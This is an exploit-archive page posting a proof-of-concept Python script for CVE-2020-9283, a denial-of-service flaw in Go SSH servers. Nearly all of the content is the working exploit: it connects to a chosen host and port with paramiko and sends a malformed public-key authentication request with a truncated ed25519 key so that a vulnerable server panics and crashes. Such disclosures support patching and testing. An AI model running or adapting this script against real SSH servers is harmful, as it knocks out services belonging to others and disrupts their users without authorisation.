Go SSH 0.0.2 Denial Of Service

2020.02.24
Credit: Mark Adams
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC) # Author: Mark Adams # Date: 2020-02-21 # Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py # CVE: CVE-2020-9283 # # Running this script may crash the remote SSH server if it is vulnerable. # The GitHub repository contains a vulnerable and fixed SSH server for testing. # # $ python poc.py # ./poc.py <host> <port> <user> # # $ python poc.py localhost 2022 root # Malformed auth request sent. This should cause a panic on the remote server. # #!/usr/bin/env python import socket import sys import paramiko from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST if len(sys.argv) != 4: print('./poc.py <host> <port> <user>') sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) t = paramiko.Transport(sock) t.start_client() t.lock.acquire() m = paramiko.Message() m.add_byte(cMSG_SERVICE_REQUEST) m.add_string("ssh-userauth") t._send_message(m) m = paramiko.Message() m.add_byte(cMSG_USERAUTH_REQUEST) m.add_string(user) m.add_string("ssh-connection") m.add_string('publickey') m.add_boolean(True) m.add_string('ssh-ed25519') # Send an SSH key that is too short (ed25519 keys are 32 bytes) m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short') # Send an empty signature (the server won't get far enough to validate it) m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00') t._send_message(m) print('Malformed auth request sent. This should cause a panic on the remote server.')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top